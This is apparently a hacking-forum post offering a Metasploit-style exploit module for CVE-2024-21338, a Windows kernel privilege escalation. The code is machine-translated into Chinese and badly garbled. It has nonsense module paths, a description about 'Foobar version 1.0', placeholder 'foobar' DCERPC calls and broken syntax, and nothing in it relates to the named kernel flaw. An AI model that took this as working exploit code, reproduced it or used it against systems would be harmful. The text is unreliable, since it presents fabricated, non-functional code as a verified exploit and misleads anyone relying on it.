H

Microsoft Windows 10.0.17763.5458-内核特权升级

HackApt-37 Team已验证会员

黑客倉庫站長

贡献: 83%
######################
#利用标题: Microsoft Windows 10.0.17763.5458-内核特权升级
#利用作者: E1代码
#CVE: CVE-2024-21338
######################
需要“ MSF/Core”
类MSF:EXPLOIT3:REMOTE
等级=正常的
包括MSF:EXPLOIT:REMOTE3:DCERPC
包括MSF:EXPLOIT:3:REMOTE3:DCERPC333333333:MS08_067333333333:ARTIFACT
def初始化(info={})
极好的(
update_info(
信息,
'name'='cve-2024-21338 exploit',
'description'='该模块利用Foobar版本1.0中的漏洞。它可能导致远程代码执行。”,
'作者'='你',
'许可证'=msf_license,
'参考'=[
['cve','2024-21338']
这是给出的


register_options(
[
optString.new('rhost',[true,'目标地址','127.0.0.1']),),),
optport.new('rport',[true,'目标端口',1234])
这是给出的

结尾
DEF检查
连接
开始
Impacket_artifact(dcerpc_binding('ncacn_ip_tcp'),'foobar')
REX:POST3:MERTERPRETER:REQUESTERROR
返回exploit:checkCode:SAFE
结尾
exploit:checkCode:Appears
结尾
DEF利用
连接
开始
Impacket_artifact(
dcerpc_binding('ncacn_ip_tcp'),
'foobar',
数据存储['foobarpayload']

REX:POST3:MERTERPRETER:REQUESTERROR
fail_with失败3:unexpedreply,“ Impacket_artifact的意外响应”
结尾
处理程序
断开
结尾
结尾
#Refrence : https://nvd.nist.gov/vuln/detail/cve-2024-21338
 
后退
顶部